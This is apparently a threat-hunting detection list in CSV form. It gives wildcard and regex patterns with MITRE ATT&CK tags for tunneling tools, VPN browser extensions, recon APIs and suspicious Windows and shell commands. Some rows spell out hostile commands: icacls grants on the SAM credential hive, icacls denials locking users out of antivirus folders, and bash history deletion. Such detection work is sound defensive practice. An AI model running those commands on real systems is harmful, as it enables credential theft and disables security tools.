"*github*ao-space/gt*",".{0,1000}github.{0,1000}ao\-space\/gt.{0,1000}","greyware_tool_keyword","gt","Fast WebSocket(s)/HTTP(s)/TCP relay proxy for making tunnels to localhost.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/ao-space/gt","1","1","N/A","N/A","10","10","111","32","2024-05-26T09:48:05Z","2021-11-29T03:09:56Z"
"*linux-amd64-client -local http://127.0.0.1*",".{0,1000}linux\-amd64\-client\s\-local\shttp\:\/\/127\.0\.0\.1.{0,1000}","greyware_tool_keyword","gt","Fast WebSocket(s)/HTTP(s)/TCP relay proxy for making tunnels to localhost.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/ao-space/gt","1","0","N/A","N/A","10","10","111","32","2024-05-26T09:48:05Z","2021-11-29T03:09:56Z"
"*linux-amd64-server -addr *",".{0,1000}linux\-amd64\-server\s\-addr\s.{0,1000}","greyware_tool_keyword","gt","Fast WebSocket(s)/HTTP(s)/TCP relay proxy for making tunnels to localhost.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/ao-space/gt","1","0","N/A","N/A","10","10","111","32","2024-05-26T09:48:05Z","2021-11-29T03:09:56Z"
"*http://api.guerrillamail.com/ajax.php?*",".{0,1000}http\:\/\/api\.guerrillamail\.com\/ajax\.php\?.{0,1000}","greyware_tool_keyword","guerrillamail","using the API of a disposable email address to use anytime - could be abused by malicious actors","T1071.003","TA0005 - TA0001","N/A","N/A","Defense Evasion","https://www.guerrillamail.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*https://www.guerrillamail.com/compose*",".{0,1000}https\:\/\/www\.guerrillamail\.com\/compose.{0,1000}","greyware_tool_keyword","guerrillamail","disposable email address to use anytime.","T1071.003","TA0005 - TA0001","N/A","N/A","Defense Evasion","https://www.guerrillamail.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*https://www.guerrillamail.com/inbox*",".{0,1000}https\:\/\/www\.guerrillamail\.com\/inbox.{0,1000}","greyware_tool_keyword","guerrillamail","disposable email address to use anytime.","T1071.003","TA0005 - TA0001","N/A","N/A","Defense Evasion","https://www.guerrillamail.com","1","1","N/A","N/A","8","9","N/A","N/A","N/A","N/A"
"*knajdeaocbpmfghhmijicidfcmdgbdpm*",".{0,1000}knajdeaocbpmfghhmijicidfcmdgbdpm.{0,1000}","greyware_tool_keyword","Guru VPN & Proxy","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A"
"*hackforums.net/*",".{0,1000}hackforums\.net\/.{0,1000}","greyware_tool_keyword","hackforums.net","Hack Forums - a well-known online community frequently referenced in various pieces of malicious code","T1588.003","TA0011","N/A","N/A","Exploitation tool","hackforums.net","1","1","N/A","N/A","6","10","N/A","N/A","N/A","N/A"
"*keodbianoliadkoelloecbhllnpiocoi*",".{0,1000}keodbianoliadkoelloecbhllnpiocoi.{0,1000}","greyware_tool_keyword","Hide My IP VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A"
"*amnoibeflfphhplmckdbiajkjaoomgnj*",".{0,1000}amnoibeflfphhplmckdbiajkjaoomgnj.{0,1000}","greyware_tool_keyword","HideAll VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A"
"*dbdbnchagbkhknegmhgikkleoogjcfge*",".{0,1000}dbdbnchagbkhknegmhgikkleoogjcfge.{0,1000}","greyware_tool_keyword","Hideman VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A"
"*history -d -2 && history -d -1*",".{0,1000}history\s\-d\s\-2\s\&\&\shistory\s\-d\s\-1.{0,1000}","greyware_tool_keyword","history","Removes the most recently logged command.","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","N/A","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A"
"*poeojclicodamonabcabmapamjkkmnnk*",".{0,1000}poeojclicodamonabcabmapamjkkmnnk.{0,1000}","greyware_tool_keyword","HMA VPN Proxy Unblocker","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","#registry","N/A","8","10","N/A","N/A","N/A","N/A"
"*gkojfkhlekighikafcpjkiklfbnlmeio*",".{0,1000}gkojfkhlekighikafcpjkiklfbnlmeio.{0,1000}","greyware_tool_keyword","Hola Free VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","#registry","N/A","8","10","N/A","N/A","N/A","N/A"
"*kcdahmgmaagjhocpipbodaokikjkampi*",".{0,1000}kcdahmgmaagjhocpipbodaokikjkampi.{0,1000}","greyware_tool_keyword","Hola VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","#registry","N/A","8","10","N/A","N/A","N/A","N/A"
"*homeassistant.local:8123*",".{0,1000}homeassistant\.local\:8123.{0,1000}","greyware_tool_keyword","homeway.io","Expose local servers to the internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://homeway.io/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*https://homeway.io/install.sh*",".{0,1000}https\:\/\/homeway\.io\/install\.sh.{0,1000}","greyware_tool_keyword","homeway.io","Expose local servers to the internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://homeway.io/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*ejkaocphofnobjdedneohbbiilggdlbi*",".{0,1000}ejkaocphofnobjdedneohbbiilggdlbi.{0,1000}","greyware_tool_keyword","Hotspot Shield Elite VPN Proxy","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","#registry","N/A","8","10","N/A","N/A","N/A","N/A"
"*nlbejmccbhkncgokjcmghpfloaajcffj*",".{0,1000}nlbejmccbhkncgokjcmghpfloaajcffj.{0,1000}","greyware_tool_keyword","Hotspot Shield Free VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","#registry","N/A","8","10","N/A","N/A","N/A","N/A"
"*nbcojefnccbanplpoffopkoepjmhgdgh*",".{0,1000}nbcojefnccbanplpoffopkoepjmhgdgh.{0,1000}","greyware_tool_keyword","Hoxx VPN Proxy","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","#registry","N/A","8","10","N/A","N/A","N/A","N/A"
"*python -m http.server*",".{0,1000}python\s\-m\shttp\.server.{0,1000}","greyware_tool_keyword","http.server","setup a simple http server","T1071.001 - T1105 - T1213","TA00010 - TA0009","N/A","N/A","Data Exfiltration","https://x.com/mthcht/status/1827714529687658796","1","0","N/A","N/A","6","10","N/A","N/A","N/A","N/A"
"*python3 -m http.server*",".{0,1000}python\s\-m\shttp\.server.{0,1000}","greyware_tool_keyword","http.server","setup a simple http server","T1071.001 - T1105 - T1213","TA00010 - TA0009","N/A","N/A","Data Exfiltration","https://x.com/mthcht/status/1827714529687658796","1","0","N/A","N/A","6","10","N/A","N/A","N/A","N/A"
"*lneaocagcijjdpkcabeanfpdbmapcjjg*",".{0,1000}lneaocagcijjdpkcabeanfpdbmapcjjg.{0,1000}","greyware_tool_keyword","Hub VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","#registry","N/A","8","10","N/A","N/A","N/A","N/A"
"*curl https://api.hunter.io/v2/domain-search?domain=*",".{0,1000}curl\shttps\:\/\/api\.hunter\.io\/v2\/domain\-search\?domain\=.{0,1000}","greyware_tool_keyword","Hunter.io","used by attacker and pentester while gathering information. Hunter lets you find email addresses in seconds and connect with the people that matter for your business","T1597 - T1526 - T1087 - T1078 - T1056 - T1018 - T1016 - T1583 - T1589","TA0001 - TA0002 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Reconnaissance","https://hunter.io/","1","0","N/A","N/A","N/A","10","N/A","N/A","N/A","N/A"
"*curl https://api.hunter.io/v2/email-finder?domain=*",".{0,1000}curl\shttps\:\/\/api\.hunter\.io\/v2\/email\-finder\?domain\=.{0,1000}","greyware_tool_keyword","Hunter.io","used by attacker and pentester while gathering information. Hunter lets you find email addresses in seconds and connect with the people that matter for your business","T1597 - T1526 - T1087 - T1078 - T1056 - T1018 - T1016 - T1583 - T1589","TA0001 - TA0002 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Reconnaissance","https://hunter.io/","1","0","N/A","N/A","N/A","10","N/A","N/A","N/A","N/A"
"*curl https://api.hunter.io/v2/email-verifier?email=*",".{0,1000}curl\shttps\:\/\/api\.hunter\.io\/v2\/email\-verifier\?email\=.{0,1000}","greyware_tool_keyword","Hunter.io","used by attacker and pentester while gathering information. Hunter lets you find email addresses in seconds and connect with the people that matter for your business","T1597 - T1526 - T1087 - T1078 - T1056 - T1018 - T1016 - T1583 - T1589","TA0001 - TA0002 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Reconnaissance","https://hunter.io/","1","0","N/A","N/A","N/A","10","N/A","N/A","N/A","N/A"
"*https://api.hunter.io/*",".{0,1000}https\:\/\/api\.hunter\.io\/.{0,1000}","greyware_tool_keyword","Hunter.io","used by attacker and pentester while gathering information. Hunter lets you find email addresses in seconds and connect with the people that matter for your business","T1597 - T1526 - T1087 - T1078 - T1056 - T1018 - T1016 - T1583 - T1589","TA0001 - TA0002 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Reconnaissance","https://hunter.io/","1","1","N/A","N/A","N/A","10","N/A","N/A","N/A","N/A"
"*https://hunter.io/*",".{0,1000}https\:\/\/hunter\.io\/.{0,1000}","greyware_tool_keyword","Hunter.io","used by attacker and pentester while gathering information. Hunter lets you find email addresses in seconds and connect with the people that matter for your business","T1597 - T1526 - T1087 - T1078 - T1056 - T1018 - T1016 - T1583 - T1589","TA0001 - TA0002 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Reconnaissance","https://hunter.io/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
"*/hypertunnel.git*",".{0,1000}\/hypertunnel\.git.{0,1000}","greyware_tool_keyword","hypertunnel","Expose any local TCP/IP service on the internet","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/berstend/hypertunnel","1","1","N/A","N/A","10","10","234","45","2022-12-08T19:13:24Z","2018-06-11T05:29:58Z"
"*/hypertunnel-tcp-relay*.tar.gz*",".{0,1000}\/hypertunnel\-tcp\-relay.{0,1000}\.tar\.gz.{0,1000}","greyware_tool_keyword","hypertunnel","Expose any local TCP/IP service on the internet","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/berstend/hypertunnel","1","1","N/A","N/A","10","10","234","45","2022-12-08T19:13:24Z","2018-06-11T05:29:58Z"
"*/hypertunnel-tcp-relay*.zip*",".{0,1000}\/hypertunnel\-tcp\-relay.{0,1000}\.zip.{0,1000}","greyware_tool_keyword","hypertunnel","Expose any local TCP/IP service on the internet","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/berstend/hypertunnel","1","1","N/A","N/A","10","10","234","45","2022-12-08T19:13:24Z","2018-06-11T05:29:58Z"
"*23fe91b0f562494d22d23a02a05f35847520170930ceb92cffa6783229b46d78*",".{0,1000}23fe91b0f562494d22d23a02a05f35847520170930ceb92cffa6783229b46d78.{0,1000}","greyware_tool_keyword","hypertunnel","Expose any local TCP/IP service on the internet","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/berstend/hypertunnel","1","0","#filehash","N/A","10","10","234","45","2022-12-08T19:13:24Z","2018-06-11T05:29:58Z"
"*berstend/hypertunnel*",".{0,1000}berstend\/hypertunnel.{0,1000}","greyware_tool_keyword","hypertunnel","Expose any local TCP/IP service on the internet","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/berstend/hypertunnel","1","1","N/A","N/A","10","10","234","45","2022-12-08T19:13:24Z","2018-06-11T05:29:58Z"
"*https://hypertunnel.ga*",".{0,1000}https\:\/\/hypertunnel\.ga.{0,1000}","greyware_tool_keyword","hypertunnel","Expose any local TCP/IP service on the internet","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/berstend/hypertunnel","1","1","N/A","N/A","10","10","234","45","2022-12-08T19:13:24Z","2018-06-11T05:29:58Z"
"*hypertunnel.lvh.me*",".{0,1000}hypertunnel\.lvh\.me.{0,1000}","greyware_tool_keyword","hypertunnel","Expose any local TCP/IP service on the internet","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/berstend/hypertunnel","1","1","N/A","N/A","10","10","234","45","2022-12-08T19:13:24Z","2018-06-11T05:29:58Z"
"*hypertunnel-server@latest*",".{0,1000}hypertunnel\-server\@latest.{0,1000}","greyware_tool_keyword","hypertunnel","Expose any local TCP/IP service on the internet","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/berstend/hypertunnel","1","1","N/A","N/A","10","10","234","45","2022-12-08T19:13:24Z","2018-06-11T05:29:58Z"
"*local.hypertunnel.lvh.me*",".{0,1000}local\.hypertunnel\.lvh\.me.{0,1000}","greyware_tool_keyword","hypertunnel","Expose any local TCP/IP service on the internet","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/berstend/hypertunnel","1","0","N/A","N/A","10","10","234","45","2022-12-08T19:13:24Z","2018-06-11T05:29:58Z"
"*MIIJKgIBAAKCAgEAuvAs1YNtpCaqyG3Rkyutst3uIjzYLQTPWf1v+OLi3GgzshUB*",".{0,1000}MIIJKgIBAAKCAgEAuvAs1YNtpCaqyG3Rkyutst3uIjzYLQTPWf1v\+OLi3GgzshUB.{0,1000}","greyware_tool_keyword","hypertunnel","Expose any local TCP/IP service on the internet","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/berstend/hypertunnel","1","0","N/A","N/A","10","10","234","45","2022-12-08T19:13:24Z","2018-06-11T05:29:58Z"
"*npm install hypertunnel-server*",".{0,1000}npm\sinstall\shypertunnel\-server.{0,1000}","greyware_tool_keyword","hypertunnel","Expose any local TCP/IP service on the internet","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/berstend/hypertunnel","1","0","N/A","N/A","10","10","234","45","2022-12-08T19:13:24Z","2018-06-11T05:29:58Z"
"*packages/hypertunnel/*",".{0,1000}packages\/hypertunnel\/.{0,1000}","greyware_tool_keyword","hypertunnel","Expose any local TCP/IP service on the internet","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/berstend/hypertunnel","1","1","N/A","N/A","10","10","234","45","2022-12-08T19:13:24Z","2018-06-11T05:29:58Z"
"*packages/hypertunnel-server*",".{0,1000}packages\/hypertunnel\-server.{0,1000}","greyware_tool_keyword","hypertunnel","Expose any local TCP/IP service on the internet","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/berstend/hypertunnel","1","1","N/A","N/A","10","10","234","45","2022-12-08T19:13:24Z","2018-06-11T05:29:58Z"
"*packages/hypertunnel-tcp-relay*",".{0,1000}packages\/hypertunnel\-tcp\-relay.{0,1000}","greyware_tool_keyword","hypertunnel","Expose any local TCP/IP service on the internet","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/berstend/hypertunnel","1","1","N/A","N/A","10","10","234","45","2022-12-08T19:13:24Z","2018-06-11T05:29:58Z"
"*icacls ""%appdata%\Microsoft\Windows\Start Menu\Programs\Startup"" 2>nul*",".{0,1000}icacls\s\""\%appdata\%\\Microsoft\\Windows\\Start\sMenu\\Programs\\Startup\""\s2\>nul.{0,1000}","greyware_tool_keyword","icacls","associated with PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","N/A","N/A","10","10","15620","3035","2024-08-28T20:16:43Z","2019-01-13T19:58:24Z"
"*icacls ""%programdata%\Microsoft\Windows\Start Menu\Programs\Startup"" 2>nul*",".{0,1000}icacls\s\""\%programdata\%\\Microsoft\\Windows\\Start\sMenu\\Programs\\Startup\""\s2\>nul.{0,1000}","greyware_tool_keyword","icacls","associated with PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","N/A","N/A","10","10","15620","3035","2024-08-28T20:16:43Z","2019-01-13T19:58:24Z"
"*icacls ""%programdata%\Microsoft\Windows\Start Menu\Programs\Startup\*"" 2>nul*",".{0,1000}icacls\s\""\%programdata\%\\Microsoft\\Windows\\Start\sMenu\\Programs\\Startup\\.{0,1000}\""\s2\>nul.{0,1000}","greyware_tool_keyword","icacls","associated with PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","N/A","N/A","10","10","15620","3035","2024-08-28T20:16:43Z","2019-01-13T19:58:24Z"
"*icacls ""C:\Documents and Settings\%username%\Start Menu\Programs\Startup"" 2>nul*",".{0,1000}icacls\s\""C\:\\Documents\sand\sSettings\\\%username\%\\Start\sMenu\\Programs\\Startup\""\s2\>nul.{0,1000}","greyware_tool_keyword","icacls","associated with PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","N/A","N/A","10","10","15620","3035","2024-08-28T20:16:43Z","2019-01-13T19:58:24Z"
"*icacls ""C:\Documents and Settings\%username%\Start Menu\Programs\Startup\*"" 2>nul*",".{0,1000}icacls\s\""C\:\\Documents\sand\sSettings\\\%username\%\\Start\sMenu\\Programs\\Startup\\.{0,1000}\""\s2\>nul.{0,1000}","greyware_tool_keyword","icacls","associated with PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","N/A","N/A","10","10","15620","3035","2024-08-28T20:16:43Z","2019-01-13T19:58:24Z"
"*icacls ""C:\Documents and Settings\All Users\Start Menu\Programs\Startup"" 2>nul*",".{0,1000}icacls\s\""C\:\\Documents\sand\sSettings\\All\sUsers\\Start\sMenu\\Programs\\Startup\""\s2\>nul.{0,1000}","greyware_tool_keyword","icacls","associated with PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","N/A","N/A","10","10","15620","3035","2024-08-28T20:16:43Z","2019-01-13T19:58:24Z"
"*icacls ""C:\Documents and Settings\All Users\Start Menu\Programs\Startup\*"" 2>nul*",".{0,1000}icacls\s\""C\:\\Documents\sand\sSettings\\All\sUsers\\Start\sMenu\\Programs\\Startup\\.{0,1000}\""\s2\>nul.{0,1000}","greyware_tool_keyword","icacls","associated with PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","N/A","N/A","10","10","15620","3035","2024-08-28T20:16:43Z","2019-01-13T19:58:24Z"
"*icacls ""C:\windows\system32\config\SAM"" /grant*",".{0,1000}icacls\s\""C\:\\windows\\system32\\config\\SAM\""\s\/grant.{0,1000}","greyware_tool_keyword","icalcs","commands from wmiexec2.0 -  is the same wmiexec that everyone knows and loves (debatable). This 2.0 version is obfuscated to avoid well known signatures from various AV engines.","T1047 - T1027 - T1059","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/ice-wzl/wmiexec2","1","1","N/A","N/A","9","1","27","1","2024-06-12T17:56:15Z","2023-02-07T22:10:08Z"
"*icacls *(x86)\360"" * /deny %username%:(OI)(CI)(F)*",".{0,1000}icacls\s.{0,1000}\(x86\)\\360\""\s.{0,1000}\s\/deny\s\%username\%\:\(OI\)\(CI\)\(F\).{0,1000}","greyware_tool_keyword","icalcs","malware behavior - modify the permissions on files or directories that match AV name","T1222","TA0005","N/A","N/A","Defense Evasion","https://www.hybrid-analysis.com/sample/22a2fc907d960e67fe9def8946907fd324f77afce3f2792750f1ddb1de76fc9f/5ed63f715448965c0d232702","1","0","N/A","N/A","10","8","N/A","N/A","N/A","N/A"
"*icacls *\360safe* /deny %username%:(OI)(CI)(F)*",".{0,1000}icacls\s.{0,1000}\\360safe.{0,1000}\s\/deny\s\%username\%\:\(OI\)\(CI\)\(F\).{0,1000}","greyware_tool_keyword","icalcs","malware behavior - modify the permissions on files or directories that match AV name","T1222","TA0005","N/A","N/A","Defense Evasion","https://www.hybrid-analysis.com/sample/22a2fc907d960e67fe9def8946907fd324f77afce3f2792750f1ddb1de76fc9f/5ed63f715448965c0d232702","1","0","N/A","N/A","10","8","N/A","N/A","N/A","N/A"
"*icacls *\AVAST Software* /deny %username%:(OI)(CI)(F)*",".{0,1000}icacls\s.{0,1000}\\AVAST\sSoftware.{0,1000}\s\/deny\s\%username\%\:\(OI\)\(CI\)\(F\).{0,1000}","greyware_tool_keyword","icalcs","malware behavior - modify the permissions on files or directories that match AV name","T1222","TA0005","N/A","N/A","Defense Evasion","https://www.hybrid-analysis.com/sample/22a2fc907d960e67fe9def8946907fd324f77afce3f2792750f1ddb1de76fc9f/5ed63f715448965c0d232702","1","0","N/A","N/A","10","8","N/A","N/A","N/A","N/A"
"*icacls *\AVG""* /deny %username%:(OI)(CI)(F)*",".{0,1000}icacls\s.{0,1000}\\AVG\"".{0,1000}\s\/deny\s\%username\%\:\(OI\)\(CI\)\(F\).{0,1000}","greyware_tool_keyword","icalcs","malware behavior - modify the permissions on files or directories that match AV name","T1222","TA0005","N/A","N/A","Defense Evasion","https://www.hybrid-analysis.com/sample/22a2fc907d960e67fe9def8946907fd324f77afce3f2792750f1ddb1de76fc9f/5ed63f715448965c0d232702","1","0","N/A","N/A","10","8","N/A","N/A","N/A","N/A"
"*icacls *\Avira* /deny %username%:(OI)(CI)(F)*",".{0,1000}icacls\s.{0,1000}\\Avira.{0,1000}\s\/deny\s\%username\%\:\(OI\)\(CI\)\(F\).{0,1000}","greyware_tool_keyword","icalcs","malware behavior - modify the permissions on files or directories that match AV name","T1222","TA0005","N/A","N/A","Defense Evasion","https://www.hybrid-analysis.com/sample/22a2fc907d960e67fe9def8946907fd324f77afce3f2792750f1ddb1de76fc9f/5ed63f715448965c0d232702","1","0","N/A","N/A","10","8","N/A","N/A","N/A","N/A"
"*icacls *\Cezurity* /deny %username%:(OI)(CI)(F)*",".{0,1000}icacls\s.{0,1000}\\Cezurity.{0,1000}\s\/deny\s\%username\%\:\(OI\)\(CI\)\(F\).{0,1000}","greyware_tool_keyword","icalcs","malware behavior - modify the permissions on files or directories that match AV name","T1222","TA0005","N/A","N/A","Defense Evasion","https://www.hybrid-analysis.com/sample/22a2fc907d960e67fe9def8946907fd324f77afce3f2792750f1ddb1de76fc9f/5ed63f715448965c0d232702","1","0","N/A","N/A","10","8","N/A","N/A","N/A","N/A"
"*icacls *\COMODO* /deny %username%:(OI)(CI)(F)*",".{0,1000}icacls\s.{0,1000}\\COMODO.{0,1000}\s\/deny\s\%username\%\:\(OI\)\(CI\)\(F\).{0,1000}","greyware_tool_keyword","icalcs","malware behavior - modify the permissions on files or directories that match AV name","T1222","TA0005","N/A","N/A","Defense Evasion","https://www.hybrid-analysis.com/sample/22a2fc907d960e67fe9def8946907fd324f77afce3f2792750f1ddb1de76fc9f/5ed63f715448965c0d232702","1","0","N/A","N/A","10","8","N/A","N/A","N/A","N/A"
"*icacls *\Doctor Web* /deny %username%:(OI)(CI)(F)*",".{0,1000}icacls\s.{0,1000}\\Doctor\sWeb.{0,1000}\s\/deny\s\%username\%\:\(OI\)\(CI\)\(F\).{0,1000}","greyware_tool_keyword","icalcs","malware behavior - modify the permissions on files or directories that match AV name","T1222","TA0005","N/A","N/A","Defense Evasion","https://www.hybrid-analysis.com/sample/22a2fc907d960e67fe9def8946907fd324f77afce3f2792750f1ddb1de76fc9f/5ed63f715448965c0d232702","1","0","N/A","N/A","10","8","N/A","N/A","N/A","N/A"
"*icacls *\Enigma Software Group* /deny %username%:(OI)(CI)(F)*",".{0,1000}icacls\s.{0,1000}\\Enigma\sSoftware\sGroup.{0,1000}\s\/deny\s\%username\%\:\(OI\)\(CI\)\(F\).{0,1000}","greyware_tool_keyword","icalcs","malware behavior - modify the permissions on files or directories that match AV name","T1222","TA0005","N/A","N/A","Defense Evasion","https://www.hybrid-analysis.com/sample/22a2fc907d960e67fe9def8946907fd324f77afce3f2792750f1ddb1de76fc9f/5ed63f715448965c0d232702","1","0","N/A","N/A","10","8","N/A","N/A","N/A","N/A"
"*icacls *\ESET* /deny %username%:(OI)(CI)(F)*",".{0,1000}icacls\s.{0,1000}\\ESET.{0,1000}\s\/deny\s\%username\%\:\(OI\)\(CI\)\(F\).{0,1000}","greyware_tool_keyword","icalcs","malware behavior - modify the permissions on files or directories that match AV name","T1222","TA0005","N/A","N/A","Defense Evasion","https://www.hybrid-analysis.com/sample/22a2fc907d960e67fe9def8946907fd324f77afce3f2792750f1ddb1de76fc9f/5ed63f715448965c0d232702","1","0","N/A","N/A","10","8","N/A","N/A","N/A","N/A"
"*icacls *\GRIZZLY Antivirus* /deny %username%:(OI)(CI)(F)*",".{0,1000}icacls\s.{0,1000}\\GRIZZLY\sAntivirus.{0,1000}\s\/deny\s\%username\%\:\(OI\)\(CI\)\(F\).{0,1000}","greyware_tool_keyword","icalcs","malware behavior - modify the permissions on files or directories that match AV name","T1222","TA0005","N/A","N/A","Defense Evasion","https://www.hybrid-analysis.com/sample/22a2fc907d960e67fe9def8946907fd324f77afce3f2792750f1ddb1de76fc9f/5ed63f715448965c0d232702","1","0","N/A","N/A","10","8","N/A","N/A","N/A","N/A"
"*icacls *\grizzly* /deny %username%:(OI)(CI)(F)*",".{0,1000}icacls\s.{0,1000}\\grizzly.{0,1000}\s\/deny\s\%username\%\:\(OI\)\(CI\)\(F\).{0,1000}","greyware_tool_keyword","icalcs","malware behavior - modify the permissions on files or directories that match AV name","T1222","TA0005","N/A","N/A","Defense Evasion","https://www.hybrid-analysis.com/sample/22a2fc907d960e67fe9def8946907fd324f77afce3f2792750f1ddb1de76fc9f/5ed63f715448965c0d232702","1","0","N/A","N/A","10","8","N/A","N/A","N/A","N/A"
